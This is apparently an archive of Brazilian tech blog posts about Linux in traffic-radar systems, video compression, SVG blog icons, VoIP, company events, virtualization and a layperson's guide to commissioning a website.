Suas Multas e Linux

Sabe aquela multa de radar que você recebeu? Foi enviada pelo Tux.

Mas não o culpe por isso. Linux só foi a base tecnológica para todo o sistema.
Ontem conversei bastante com o pessoal da Engebras, empresa que cria e administra a maioria dos radares de São Paulo e outros estados. Já tinha ouvido falar que todos os sistemas para suportar essa monitoração era baseada em Linux, e eles contaram mais detalhes. Continue lendo…


Os radares são na verdade câmeras analógicas com sensibilidade melhorada conectadas a computadores próximos que rodam Linux que por sua vez digitalizam a imagem instantaneamente com a ajuda de placas de captura de vídeo. As placas dos carros são imediatamente reconhecidas por OCR por uma biblioteca de uma empresa israelense, a multa é impressa, enviada pelo correio, recolhida no banco e repassada para o governo estadual, federal ou município, dependendo da jurisdição.

Todos os carros que passam por um radar — infrator ou não — são filmados. Não é uma câmera fotográfica, e sim uma filmadora.

Tazo (gerente de informática da Engebras) e seu pessoal afirmaram que todos os sevidores da empresa rodam Linux. Coisa de 50 a 60 servidores. Mas são servidores paravirtuais. Porque servidores físicos mesmo a empresa tem menos de 10.

Fiquei feliz em ver um exemplo vivo de um datacenter inteiramente virtual, e imaginei a flexibilidade operacional que eles tem em fazer movimentações de serviços sem indisponibilidades.

Mostraram sua extranet onde pode-se ver as fotos de infrações do momento, mais estatísticas de variação de velocidade média por hora, número de veículos, e até seu tamanho. Mostraram também como motoqueiros cometem infrações, mas escondem sua placa com a mão.


Além disso, imediatamente consultam uma base de dados de veículos não licenciados (em MySQL), mas aqui não se pode multar por radar. Por outro lado uma aviso é enviado para a polícia da região, avisando a placa e o ponto onde o veículo foi detectado.

40% da frota nacional não é licenciada, inclusive viaturas da polícia.

Há também os radares de farol, onde não basta uma imagem estática. É necessário registrar o movimento do veículo ultrapassando o sinal vermelho como evidência. Neste caso são usados softwares livres como ffmpeg para gerar este clip em MPEG.

A comunicação entre os radares e o datacenter central é geralmente provida por GPRS, pelas operadoras de celular da localidade.

Se tiver sorte, o pessoal da Engebras vai passar no meu blog para dar mais detalhes de sua operação.

Supra-sumo em Compressão de Video

Andei estudando tecnologias de compressão de vídeo e é um mundo fascinante. Tudo sobre Linux.

DivX e Xvid são compressores ainda bons mas de gerações anteriores. O mais moderno e avançado é o H.264 também conhecido por MPEG-4 AVC, padrão ISO. Uma das melhores implementações desse compressor é livre: o projeto x264.

E sobre containers, um dos mais completos hoje em dia é o MP4. Um mesmo arquivo MP4 pode conter uma trilha de vídeo, outra de vídeo em outros ângulos, outra de audio em inglês, outra de audio em português, e outras de legendas em várias linguas, em Unicode, menu como o de um DVD, informação sobre capítulos etc. Isso é um significativo avanço em relação ao container AVI da Microsoft que não suportava nada disso. Pode-se fazer um backup de um DVD para um arquivo MP4, incluindo toda a sua interatividade, menus e capítulos.

Apesar do nome sugestivo, MP4 não é a evolução do MP3. Afirmar isso é como dizer que .gif evoluiu para .tar, coisa que não faz sentido. A evolução do MP3 é AAC e HE-AAC. MP4 (um formato de container) pode conter streams MP3 (um formato de audio), como fiz abaixo, mas o mais natural e moderno é um MP4 conter streams AAC.

Converti um vídeo de 53 segundos que fiz com minha câmera. Veja a comparação:

  Original.avi Comprimido.mp4
Geral 53s, 15.077 kb/s, 640×480, 30 quadros por segundo 53s, 2.495 kb/s, 640×480, 30 quadros por segundo
Tamanho 100.326.316 Bytes 16.639.145 Bytes
Trilha de vídeo 99.697.780 Bytes, compressão Motion JPEG 15.952.188 Bytes, compressão H.264
Trilha de audio 586.888 Bytes, formato PCM mono 11,024 Hz 657.699 Bytes, compressão MP3 mono 22,05 Hz 64kbps
Overhead do container 41.648 Bytes ou 0.04% do tamanho do arquivo 29.258 Bytes ou 0.18% do tamanho do arquivo

Há duas discrepâncias aqui:

  1. O tamanho relativo do container deveria ter diminuido.
    O overhead do container MP4 é bem menor que AVI, mas como o tamanho do vídeo diminuiu muitíssimo, isso distorceu a relação do tamanho do container com o do arquivo. Se transferíssemos sem recomprimir os streams de audio e vídeo do AVI p/ MP4, veríamos uma significativa queda de overhead do container.
  2. O tamanho da trilha de audio aumentou.
    O fato é que tive sérios problemas para compactar o audio. Minha câmera grava som em formatos tão baixos que tive que aumentar a freqüência do sinal para o arquivo ser aceito pelo LAME. E ai usei bitrates talvez altos de mais para a compressão. Mas ganhei tanto com o H.264 que nem vou esquentar a cabeça.

O vídeo final é de alta qualidade (comparado com o original), e não consegui perceber diferença entre eles. Olhei várias vezes, com muita atenção.

Eu ainda fiz questão de alta qualidade, e mantive o bitrate em 2495 kbps. Poderia ter diminuido mais ainda o tamanho se fizesse compressão em 2 passos. Filmes em formato Xvid (MPEG-4 ASP) que se baixa da Internet, em boa qualidade, tem aproximadamente 850 kbps. É esperado que se dermos só 850 kbits para o H.264 trabalhar 1 segundo de vídeo, obteremos resultados melhores comparados ao Xvid.

The Blog Icons

This is a collection of high quality vectorial icons to represent common ideas and actions of the blogosphere.

They were based on the SVG work from FeedIcons.com. The base button is the same, but mathematically simplified on the XML level. New buttons were added based on other popular icons found on the web or created by myself. Also some redesign was made for new shapes to make the icons look better when exported to smaller image sizes.

By the way, I am not a designer nor an artist. I just know how to use SVG-creation tools as Inkscape or make good XML. Or I just have a blog demanding for these icons. So I’m sure people can contribute better color mixings an outlines. Let me know and lets integrate your ideas into this project in the right way.

Please share alike this icons. They have a Creative Commons license. I appreciate if you can link to my blog when using them.

Icons for Feed and OPML

Feed IconThese icons where the base for this work, specially the feed icon as found in its website. They were probably created with proprietary tools such as Adobe Illustrator and then exported to open formats such as SVG or PNG. The original OPML icon can be found at opmlicons.com

OPML IconThe versions here are visually identical to the original ones, but mathematically simplified. They are now being maintained in an open format — SVG — here, and are a better option because of its open source code and formats, and distribution.

Icons for Trackback and Share

Trackback and Pingback IconThese icons can be found sometimes in the blogosphere. I don’t know who designed them but they are a good representation of the Trackback and Pingback ideas.

The Share icon is not my preferred but for now it is just a copy of what can be found around.

Share IconColors and shapes are identical and based on the feed icon button. I never saw these icons in a size bigger than 16×16 pixels. Now, in a scalable format, they can be rendered at any size you want.

Permalink IconThese are original creations and come in several options. I am still not sure which one is the best. You can also suggest other shapes.

As you can see, I am using this icon to identify that each section on this post has a permalink.

Other Icons

Comment Icon Edit Icon Cancel Icon Tag Icon Download Icon Clock Icon

Other original icons: Comments, Edit, Cancel, Tag, Download, Upload and Clock (to represent date and time). I’m open to suggestions for better shapes.

Challenges for Icon Sizes

The original design of these icons (from feedicons.com) looks wonderful on sizes bigger than 22 pixels, but most people will use them on small sizes as 16×16. So this package delivers also shape design that look better on small sizes as 22×22, 16×16, etc. I am using these sizes all around my blog as you can see.

Converting the SVG Files into Images

In the Blog Icons ZIP file you will find the XML:SVG source code for all icons. Additionally you will get all icons in PNG (preferred), GIF and JPG formats, in common sizes from 10×10 to 128×128 pixels. If you want a specific size, you can import the source SVG file in some graphical tool as Inkscape (on Linux), or CorelDraw, Adobe Illustrator, etc and export them into any format and size you want.

Or use the Makefile like this (on Linux you will need Inkscape and ImageMagick installed):

Make all default sizes of all icons, in PNG, GIF and JPG:

bash$ make all

Make Feed icon in GIF format, at 40×40 pixel size:

bash$ make SIZE=40 feed.gif

Make all icons, all formats at 40×40 pixel sizes:

bash$ make SIZE=40

Evento sobre Soluções Práticas para Linux

Vamos realizar aqui na IBM um evento gratuito para empresas e profissionais que prestam serviços de TI. O objetivo é mostrar possibilidades de arquiteturas que poucos conhecem mas que trazem enormes benefícios operacionais e financeiros, pois usa computação de forma ecônomica.
Abordarei os seguintes assuntos:

  • Posicionando Open Source e Linux no TI das empresas
  • Clusters de Alta Disponibilidade e Replicação
  • Paravirtualização: a última tendência em virtualização de Hardware
  • Esquemas especiais de segurança com SELinux e AppArmor
  • Grid e SOA com Linux
  • Possibilidades de Linux no desktop
  • PC Multiusuário
  • Formato OpenDocument
  • Outros

Será dia 8 de maio, próxima terça, das 14:00 às 17:30 na IBM São Paulo (rua Tutóia 1157). Sala TU02-226.

Confirme presença com a Fernanda Moraes <femoraes@br.ibm.com> por e-mail ou no telefone 11-2132-5691.

Adicione:

Venha conhecer mais profissionais de sua área, trocar idéias e tomar um café.

O Efeito Online

Estou usando barba a uns 2 anos.

Mas nesse tempo todo não troquei minhas fotos online, tipo a do MSN Messenger, Orkut, etc. No cyberespaço estou sem barba.

Ai, reencontro pessoas que não me vêem a uns 6 meses (as últimas vezes que me viram ao vivo já estava com barba), mas me dizem que estou diferente, que deixei a barba crescer !!

Isso tem acontecido com muita freqüência.

Conclusão: inconscientemente, as pessoas esperam me enxergar ao vivo com a mesma fisionomia que me vêem online.

Maravilhas da Telefonia Moderna

Vou usar este post para descarregar as coisas maravilhosas que tenho descoberto sobre telefonia móvel, VoIP, e suas aplicações para o mundo corporativo.

Este assunto é fascinante e importante porque telefonia móvel está intimamente ligada a conectividade móvel. A pessoas estarem 100% do tempo conectadas, trocando informações e conhecimento. Desde Graham Bell muita coisa mudou e o conceito todo foi diversas vezes reinventado.

  • VoIP é um assunto de muitos donos. Cada fabricante de PBX (central telefônica, Cisco, Avaya, Nortel, etc) inventa seus protocolos proprietários. O padrão universal se estabeleceu com o SIP, que é um protocolo muito parecido com HTTP.
  • A partir do momento em que duas pontas (computadores, smartphones) tem IPs e um software capaz de “falar” SIP, elas podem fazer uma conexão direta e começar a conversa de voz, video, ou texto.
  • Um softphone é um software que implementou o padrão SIP. Isso é muito fácil, em parte porque o SIP é um padrão aberto. Em Windows eu uso o PhonerLite e em Linux uso o Ekiga e o KPhone.
  • A parte proprietária do SIP são alguns codecs de voz: eles são necessários para comprimir (e descomprimir) a voz entre os interlocutores, e funcionam mais ou menos como compressão em MP3, só que otimizados para voz. Os proprietários são o G.711, G.726 e os codecs abertos são os excelentes Speex e o iLBC. Se não há um codec comum entre as duas pontas, algum intermediário terá que fazer a conversão, e esse é um dos papeis do PBX (ou central telefônica).
  • Pode-se montar uma central telefônica em casa com um PC velho e com pouca RAM, usando o Asterisk, que nada mais é do que um software que implementa a lógica de uma central. Mais fácil ainda, pode-se usar o life CD do AstLinux (que contém o Asterisk) e bootar qualquer PC como um PBX IP.
  • Pode-se montar uma central telefônica online gratuitamente, usando serviços como o PBXes. Cadastra-se os usuários e seus softphones e pode-se configurar serviços como um número para conferência, número que faz tocar vários telefones simultaneamente, caixa postal, voice mail para e-mail, etc.
  • Para usar SIP para ligar para números de telefonia convencional (land lines) no mundo todo, é necessário comprar serviços de minutagem de algum provedor. O mais barato que conheço é o SIP Discount com preços realmente agressivos, e alguns países totalmente gratuitos. Esse processo todo é similar a usar o Skype, só que o software é genérico, e a minutagem é muitíssimo mais barata. Diga-se de passagem, entre todos esses serviços de minutagem VoIP, o Skype é o mais proprietário e de longe o mais caro. Outros serviços são o Ekiga.net, Gizmo, VoIP Discount (da mesma empresa do SIP Discount, mas com softphone proprietário).
  • O único inconveniente em usar SIP é substituir o telefone pelo computador. Na prática é desconfortável, e não temos um computador conectado sempre conosco. Mas isso já está sendo resolvido. Leia adiante.

Nokia: O Celular das Pessoas Conectadas

A Nokia não me pagou para dizer isso, mas com certeza meu próximo celular será um smartphone desse fabricante, da linha N ou E.

  • Esses celulares mais avançados tem um cliente SIP embutido e integrado. Ao se escolher um número da agenda para ligar, ele pergunta se a ligação é normal ou pela Internet. Até aí não há nenhuma diferença em pegar um smartphone qualquer, por exemplo baseado em Windows Mobile 5.0, e instalar um softphone nele. Mas esse SO não vai te deixar ficar on line o tempo todo: sua bateria vai acabar antes da hora do almoço.
  • Esses celulares tem WiFi, mas não é esse o fator mais importante. WiFi em um handheld seca sua bateria em menos de duas horas conectadas. O que realmente importa é que o Symbian OS (sistema operacional desses aparelhos) foi otimizado para se manter sempre conectado por WiFi, mas economizando energia quando não há dados trafegando. Mais ainda: quando se muda de localidade, ele detecta a mudança, se reconecta e se reconfigura.
  • Quando não há redes WiFi (mais baratas ou gratuitas), pode-se usar outras redes de dados, tipo GPRS (do GSM) ou WCDMA (do CDMA). O Symbian OS trata de fazer a troca de redes de forma transparente, sem interrupções. Essa gerência automática de redes somada a otimização de uso de energia para WiFi faz esse SO ser realmente especial.
  • O SIP integrado ao celular elimina o inconveniente de precisar de um computador. O celular é o computador conectado a Internet o tempo todo, da forma mais barata possível para uma localidade que se está.
  • Uma equipe de funcionários de uma mesma empresa, portando celulares com VoIP como os da Nokia (que na verdade são os únicos do mercado hoje), usando serviços gratuitos como os do PBXes, poderão se telefonar com push-to-talk (como Nextel), fazer conferências, ter o ramal transferido para o celular, enviar SMSs, fazer video conferências por IP (no novo N73), etc, de graça. Isso quando estiverem associados a uma rede WiFi, como as de seu escritório, ou em casa. Quando estiverem na rua, ainda poderão fazer tudo isso com VoIP sobre GPRS a custos bem mais baixos do que os dos minutos de voz GSM ou CDMA, porque o custo-benefício de voz comprimida sobre IP é melhor que o de voz tradicional.
  • Para ligações internacionais ou quando estiverem viajando, esses usuários poderão receber ligações VoIP gratuitamente em seus celulares, ou fazer a custo muito baixo com serviços como SIP Discount. Além de literalmente levarem seu ramal consigo.
  • Além do mais esses celulares contam com um arsenal de ferramentas para a web, tais como um ótimo browser, melhor que a média dos handhelds do mercado, player de multimídia incluindo filmes e leitores de feeds. A soma desses elementos faz o celular ser um ótimo cliente para podcasts. Se o som do seu carro tiver bluetooth, seu Nokia pode transmitir seus podcasts favoritos para ele enquanto estiver dirigindo para o trabalho.

Se as informações aqui estão um pouco desestruturadas é porque isso foi um “dump mental” mesmo. Para compartilhar rapidamente esse conhecimento com você, leitor.

Festa no Novo Escritório da Red Hat Brasil

A Red Hat comemorou hoje seu novo escritório num dos edifícios mais novos e elegantes de São Paulo.

Endereço do novo escritório da Red Hat

Muitos parceiros e clientes foram confortavelmente recebidos para um coquetel espaçoso num escritório colorido, decorado com uma mistura de cartazes de propaganda de produtos, e outros com a famosa frase de Gandhi que foi adotada pelo Open Source:

Primeiro eles te ignoram, depois eles riem de você, depois eles lutam contra você, e depois você vence.

A primeira coisa que chamava a atenção era a “Sala de Descompressão”, onde o pessoal pode relachar jogando games. Mas depois nos levaram para conhecer as espaçosas salas de reunião, as bem equipadas salas de aula, e as salas dos gerentes.

Havia realmente muito espaço que eles pretendem preencher com novas contratações de vendedores, sales engineers, pessoal de marketing etc. E havia ainda a outra metade inteira do andar para mobiliar e ocupar. Mas em pequenos passos.

A Red Hat (ou Rêd Hétchi, como diz Alejandro Chocolat, argentino gente boa que comanda a empresa no Brasil) inaugurou sua operação por aqui ao comprar a Latin Source, empresa que já os representava no cone sul.

Estavam todos presentes: Chocolat com seu inconfundível sotaque, Julian, Gabriel Szulik (com o mesmo sobrenome do diretor mundial da empresa, mas que afirma não ser parente dele), Rodrigo Missiagia e suas belas camisas caneladas, Filipe absorvido em resolver o problema de um cliente, David Barzilay com um terno novo e bonito, Leticia, Edgar (o sopro Java/JBoss na equipe técnica de vendas), Paulo Banitz e outros tantos que lamento não lembrar o nome.

O ar da empresa tem um quê de Google: aquele ambiente descontraido onde todos trabalham por prazer, fazem o que gostam, e ainda estão na ponta da tecnologia. Eles pretendem dobrar de tamanho em um ano.

Há um lado oculto da empresa: o laboratório de tecnologia. É oculto porque seus membros não ficam muito a vista, imersos em melhorar o kernel do Linux, o JBoss, e escovar outros bits. É o lar de figurões como Marcelo Tosatti, Acme e outros.

A conversa com o Edgar, figura Java, foi particularmente interessante. Ele veio da Summa e está a uma semana na Red Hat. É o primeiro da empresa que tem a missão de falar sobre JBoss com o mercado. Contou que muitos clientes já usam JBoss gratuitamente, e que agora é hora de provar o valor de terem também suporte comercial. Contei que achava muito importante a Red Hat ter comprado a JBoss. Na linha do tempo de decidir qual tecnologias adotar, uma empresa pensa antes na plataforma de aplicações (coisas como o JBoss, WebSphere, middleware em geral), e só depois no sistema operacional (Linux). No tecnês do dia a dia, dizemos que sistema operacional é um mal necessário. Ter uma oferta tão estratégica e expressiva como o JBoss coloca a Red Hat numa posição adiantada nessa linha do tempo.

Resumo da ópera: a festa foi superdivertida e ótima para encontrar os amigos do nosso mundo de Linux comercial no Brasil.

Notas Sobre Evento de Virtualização da Novell no Rio

Ontem aconteceu o evento de Virtualização da Novell na primeira cidade brasileira: Rio de Janeiro.

Houve palestras ótimas da HP, AMD, Novell, e outros parceiros da Novell.

Roberto Brandão da AMD mostrou os detalhes arquitetônicos de seus novos processadores AMD-64 (Opteron). Gráficos esclarecedores sobre como os bits trafegam entre chipset, CPU, RAM, etc. Muito convincente. Contou também que o quadcore da AMD é o primeiro produto líder de mercado da companhia, com mais de 50% de share. Seus quadcore são realmente quatro CPU completas embutidas num chip só, incluindo gerência de memória autônoma, etc. Segundo ele, isso é mais difícil de fazer (mas traz melhores resultados de processamento e consumo de energia) do que a abordagem de dual-dual-core (dois dual core no mesmo chip), do concorrente, que não citou o nome.

Se eu tiver sorte, ele vai passar aqui no meu blog para contar mais. Roberto foi também o que mais se aprofundou nos detalhes da nova paravirtualização, e quase me deixou sem palavras. Eu tinha a pretensão de ser o único a dissecar este assunto…

Roberto contou que as novas versões do AMD-V vão ter novidades para I/O, e que estão melhorando o processador para que a virtualização tradicional (sem paravirtualização) seja mais eficiente. Obviamente essas características poderão ser aproveitadas por hypervisors de paravirtualização também.

Alexandre Gourdard da HP mostrou os blades e as abordagens que a HP tem para virtualização, tanto em Linux, Windows e HP-UX. Foi bastante focada em hardware e em serviços de gerência.

Richard Doll da Novell fez algumas apresentações. A mais interessante foi sobre o acordo com a Microsoft, e seus pontos de colaboração: (para) virtualização, gerência de identidade e federação de diretórios, formatos de documentos, administração de sistemas (integrando o Windows Updates com soluções da Novell), etc. Claro que a Microsoft quer engolir o mercado de Linux e vice-versa. Ninguém vai para o céu aqui (nem a comunidade Open Source). Mas acho que essa parceria tem pontos positivos.

Eu entrei envorgonhado porque os apresentadores antes de mim já tinham falado praticamente tudo que se podia falar sobre virtualização. Bem, virtualização de hardware somente. Mostrei a linha do tempo desse tipo de virtualização, como a IBM criou esse conceito em 1967, e até 1998 (ano de surgimento da VMWare) era a única que fazia isso. Até 2003, o ano que mudou tudo com a criação do Xen, e a reinvensão da Paravirtualização.

Mostrei os dados do Gartner que mostravam as “10 hipest technologies” para os próximos 18 a 36 meses, que tem virtualização no topo, seguido por Grid e SOA (que nada mais são do que formas diferentes de virtualização). Linux para aplicações importantes aparece em sétimo lugar.

Falei sobre virtualização de storage com o SAN Volume Controler, mostrando os benefícios em relação ao SAN tradicional.

Claro, falei sobre Xen explicando as diferenças em relação a virtualização tradicional. É incrível como todo mundo fala sobre Xen, mas não explica como e porque a parvirtualização é melhor. Acredito que se os defensores do Xen não deixarem isso claro na cabeça das pessoas, elas não vão comprar a idéia. É importante ressaltar isso.

Nas minhas tradicionais viagens filosóficas, depois de mostrar o Xen e seus benchmarks, levantei o seguinte: se a paravirtualização traz uma série de benefícios operacionais, a praticamente nenhum custo de performance, por que agora não podemos virtualizar a totalidade de nosso datacenter? Não só as pequenas instalações, mas também os grandes DBs, etc que geralmente são instalados em máquinas dedicadas. Serão máquinas paravirtuais rodando sobre um hardware dedicado. Isso é factível principalmente agora que o VMWare e virtualização da Microsoft implementarão paravirtualização também.

Fiz questão de ressaltar ao longo da apresentação que virtualização vai muito além do hardware. De fato, as virtualizações mais vantajosas, que trazem os melhores benefícios, são os que fazemos no nível do software. Isso levou a entrar no tema da virtualização invertida: Grid e SOA, onde a aplicação é maior que um computador (na virtualização de hardware, o computador é maior que a aplicação). O ponto aqui é repensar a forma como as aplicações são arquitetadas, modularizá-las, componentizar, e usar middleware para simplificar e “virtualizar” a infraestrutura. Parece que só eu falei sobre estes pontos.

No fim do evento vários clientes, parceiros, meu ex-chefe e o pessoal da Novell me comrpimentou dizendo que fiz a melhor apresentação.

Fiquei lisongeado e orgulhoso. Principalmente quando todas as outras apresentações foram tão boas.

Confira se o evento vai para sua cidade, e venha. É gratuito.

Arquivo da apresntação em ODF (5.1 MB) para OpenOffice.org e outros e em PDF (7.4 MB).

Como Criar um Website

Este guia é para você que é leigo em computadores, mas que precisa contratar alguém para fazer o site de sua empresa, restaurante, hotel, etc. Vai ajudá-lo a ter um site mais acessível, prático e funcional, usando padrões e técnicas novas e que os usuários gostam, e deixando de lado as técnicas não muito naturais da web, ou que não é de boa prática o seu uso.

Quando for comprar serviços para criar seu site, exija os seguintes pontos (os links levam para as explicações):

  1. Quero um site onde eu mesmo posso atualizar o conteúdo, como se fosse um blog.
  2. Onde hospedar o site, em que computadores ele vai rodar ?
  3. O site/blog não pode ser feito em Flash.
  4. O site/blog deve ser compatível com qualquer browser em qualquer plataforma, principalmente Firefox, Internet Explorer, Safari e Opera.
  5. Não é necessário ter uma animação de abertura.
  6. Não pode haver popups nem frames, deve ser de fácil navegação e usar permalinks semânticos.
  7. O site/blog deve conter informações objetivas e precisas.
  8. O site/blog deve usar tecnologias abertas e não-proprietárias.

Seguem os detalhes de cada ponto…

Não se chama mais site, agora é blog

Blogs estão na moda, então entre na moda.

Não é a toa. Se você disser “entre no blog do meu restaurante” ao invés de “site”, as pessoas sabem que estarão mais próximas de quem criou a informação ali, e não só da informação em sí. Na cabeça das pessoas, um site raramente é atualizado, mas um blog sempre tem novidades. O já conhecido formato de blog sugere que os visitantes poderão interagir, comentar.

Não conte para ninguém, mas site e blog são praticamente a mesma coisa, mas optando pelo formato de blog abre um leque de opções do uso de ferramentas já prontas para facilmente gerenciar seu conteúdo. Isso significa que seu site (ou blog) ficará pronto mais rápido (instantaneamente, na verdade), com mais funcionalidades, nasce bonito, e organizado de um jeito já familiar para as pessoas, além de ser interativo.

Outra vantagem de um blog é que você mesmo vai poder configurar e atualizá-lo tão facilmente quanto escreve um e-mail.

O visual de um sistema de blog como o WordPress é definido pelo tema usado. A idéia de temas pode ser comparada a uma roupa que se veste: troque de roupa e mude seu visual sem tocar no conteúdo, da mesma forma que troca-se o tema de seu blog sem interferir no conteúdo textual etc.

Há uma infinidade de temas gratuitos genéricos prontos na web, mas para uma empresa, estabelecimento, etc o ideal é contratar um webdesigner para criar (ou adaptar) um tema específico, com o seu logotipo e a sua cara. O trabalho técnico para executar esse trabalho dura aproximadamente 1 semana, e no caso do WordPress.org, o webdesigner deve ter conhecimento de PHP, além dos básicos XHTML e JavaScript (não precisa lembrar esses nomes, só garanta que seu webdesigner conhece tais tecnologias).

Em que computadores seu site vai rodar, onde hospedar ?

O custo mensal para se ter um blog/site é baxíssimo. No Brasil pode-se contratar excelentes provedores de espaço como a Insite por aproximadamente R$16 por mês. Já incluso todas as ferramentas necessárias para criar o blog, como o WordPress.org.

DreamHost bannerO provedor que escolhi para este meu site é o DreamHost que fica nos EUA. Por uns R$70 por ano eles me dão 230GB de espaço, mais banda praticamente ilimitada e um ótimo serviço. Alí pode-se rodar um blog WordPress.org, ou outros softwares que facilitarão a sua vida para gerenciar o conteúdo, seja textos, fotos, multimídia, etc: Drupal, Joomla, Gallery etc.

Seu site vai morar em computadores que rodam Linux (por oferecer maior segurança e estabilidade) e seus usuários Linux, Windows, Mac ou qualquer outro poderão navegar nele sem problema.

Evite Flash

Flash é a tecnologia que permite animações bonitinhas em sites da web, mas que começou a ser impropriamente usada para fins mais centrais de alguns sites, até o ponto enlouquecido de o site inteiro ser feito em Flash.

É ruim para seus visitantes: Flash é uma tecnologia proprietária, e nem todos os seus visitantes vão tê-lo instalado. E os que tiverem talvez o terão numa versão antiga (você lembra de ter atualizado seu Flash alguma vez?). Visitantes que usam Linux por exemplo — 20% da web aproximadamente — em geral não tem. Não exclua seus usuários.

É ruim para seu blog: Há uma ciência oculta na web chamada Search Engine Optimization (ou Otimização Para Sistemas de Busca), em que profissionais especializados conseguem fazer um site aparecer no topo da pesquisa por palavras em sites como o Google, Yahoo, MSN Search, etc. Bem, qualquer palavra ou link (isso inclui menus que levam ao texto) contidas em arquivos Flash serão invisíveis ao Google, fazendo seu blog praticamente desaparecer em resultados de busca. Os potenciais clientes que usam o Google e companhia para procurar coisas que você vende também desaparecerão.

Use Flash somente em coisas marginais e mesmo assim em elementos que não interferem na informação que seu site/blog provê.

Existem outros browsers

Lembre-se que o browser que você e seu produtor de site usam pode não ser o mesmo de todos os seus visitantes. O Firefox já usado por uns 30% da web. Para acertar neste ponto, garanta que seu blog é bem visto no Firefox, Safari (popular no Mac), Opera (popular em celulares) e Internet Explorer.

A Internet não é um panfleto de propaganda

Uma das coisas mais inúteis e irritantes de muitos sites é a tal da apresentação inicial, geralmente feita em Flash. Claro que há o link para “pular a animação” mas se este também estiver embutido no Flash pode dizer adeus a alguns visitantes: o resto de seu site é inacessível e contribui para a tal exclusão digital.

Um panfleto é recebido na rua de forma passiva, e a capa deve ser atraente para que o usuário queira abrir e ver o resto. Na Internet é diferente. Dificilmente alguém vai “cair” no seu site por acaso. As pessoas ativamente te clicaram porque acreditam que você tem a informação que elas precisam. Não as aborreça com essas apresentações iniciais. Em suma, isso só serve para duas coisas: dar uma desculpa ao webmaster que você contratou para te mostrar seus conhecimentos em operar o programa que cria aquilo, e gastar seu dinheiro pelas horas de trabalho cobradas.

Use melhor as horas pagas ao seu web-designer e peça para ele criar um site/blog semântico, que os mecanismos são capazes de ler.

Morte aos Popups

Sobre as tais janelas saltitantes que surgem quando clicamos em links de sites mal feitos, saiba que browsers modernos corretamente as bloqueiam. Se você as vê na hora que está testando seu site pela primeira vez, provavelmente foi porque o browser foi explicitamente configurado para deixá-las saltar. Em geral seus usuários não as verão.

Os popups tem outro sério problema: em sites mal feitos, certas informações preciosas só podem ser encontradas dentro de popups, e como essas janelinhas estão fora do fluxo de navegação normal (como Flash) essas informações também serão invisíveis ao Google e companhia, e não aparecerão nos resultados de busca.

Estabeleça a idéia de que todo pedaço de informação em seu site deve poder ser acessível diretamente por links externos (também conhecidos por “permalinks“), e não só navegando via a página principal.

Seus clientes querem te ligar

Você ficará surpreso em saber quantas pessoas tem preguiça de ler ou gastar 5 minutos (ou mais, se o site for desestruturado) navegando em seu blog para encontrar o que procuram.

Para aproximá-las de você, deixe seu telefone com código de área visível em todas as páginas, por exemplo no final de cada uma. Só e-mail não basta. Muito menos formulário para entrar em contato. Lembre-se: de qualquer forma, antes da Internet o único jeito de contactarem seu estabelecimento era por telefone.

Se o seu estabelecimento for um serviço, restaurante, hotel, loja, vai perceber que a maioria liga para saber onde fica, preços, se está lotado, o que há no cardápio, etc. Quando as perguntas freqüentes ficaram óbvias, trate de criar páginas com respostas claras no seu site, mapas interativos como o abaixo, etc.

map
map
Restaurante Maha Mantra
map
Cantina do Mello

Evite tecnologias proprietárias

Use padrões abertos. Eles estão disponíveis, são mais baratos, e te dão mais flexibilidade que as tecnologias proprietárias.

Não é exatamente o webdesigner quem deve escolher as tecnologias usadas em seu site. Ele vai te sugerir as que ele conhece, mas não necessariamente são as melhores para você.

Um site/blog desenvolvido com tecnologias proprietárias te forçará a ter que pagar por elas pelo resto da vida de seu site. E saiba que a cultura da Internet criou diversas tecnologias abertas, muitas vezes melhores, muitas vezes gratuitas, que te dão escolha, poder de negociação, etc.

Veja uma comparação:

Tecnologias Proprietárias (evite) Tecnologias Abertas (prefira)
Flash DHTML, Ajax, XHTML+JavaScript
ASP, ASP.NET JSP, PHP
.NET, C#, Cold Fusion, Delphi etc Java, Java Enterprise ou J2EE
Windows ou qualquer outro sistema operacional Linux
Mídia em formatos WMA, WMV e Real Mídia em formatos MP3, AAC, MPEG e Xvid (ou DivX)

Outros detalhes

  • Seu site ou blog deve usar a codificação UTF-8 ou Unicode. Esta técnica é a garantia de que acentos vão aparecer corretamente em qualquer browser e sistema operacional.
  • Evite também frames. Eles nasceram a partir de um erro de projeto, são considerados obsoletos, tem problemas similares aos popups e Flash, violam padrões, e seus criadores se arrependeram de te-los criado.

Pré-FISL em São Paulo

Acabei de sair do evento Pré-FISL em São Paulo, organizado pela 4Linux.

Foi ótimo. Com palestras e palestrantes de alta qualidade. Confira:

  • Josh Berkus, do PostreSQL, esclareceu a evolução do projeto e comunidade. Contou que a versão 8.3 do PostreSQL vai suportar DBs de vários terabytes, e que a performance da versão 8.2 atual já é comparável com o MySQL. Contou também que os nichos do PostreSQL e do MySQL são diferentes. O primeiro está focado em grandes bancos, enquanto o MySQL tende a usos exóticos ou a bancos pequenos ou até em RAM. Sobre suporte a XML do PostgreSQL mostrou os primeiros passos, mas explicou que não chegam nem perto do DB2 nesse ponto. Outro gráfico interessante é a relação do custo-benefício comparado a um “banco de dados proprietário” de cor vermelha: 80% do benefício por 15% do custo total de propriedade.
  • Maddog fez uma apresentação de tom idealista sobre thin clients, contando como terminais burros eram usados antigamente e a vida das pessoas era mais fácil. Argumentou que o projeto One Laptop Per Child é bonito mas o que importa não é o hardware e sim a conectividade em todo lugar. Quando questionei que muitas empresas já usam thinclient mas em Windows, e que o que falta é uma abordagem de mudança cultural menos infraestrutural e mais no nível das aplicações (convertendo-as para web ou para padrões abertos), ele disse que é só uma questão de volume. Quero ver… Seja como for, nós adultos também queremos um laptop conectado !
  • Jomar Silva, diretor geral da ODF Alliance Brasil, falou por uns minutos sobre ODF e sua importância para os usuários, empresas e desenvolvedores de aplicações.
  • Cezar Taurion falou pela IBM com uma palestra entitulada “Renascimento 2.0”, onde usou seu raciocínio claro e pragmático para explicar o modelo Open Source, e como ele se encaixa num modelo empresarial. Falou sobre o conceito Long Tail e como ele está relacionado a era do Mundo de Pontas.
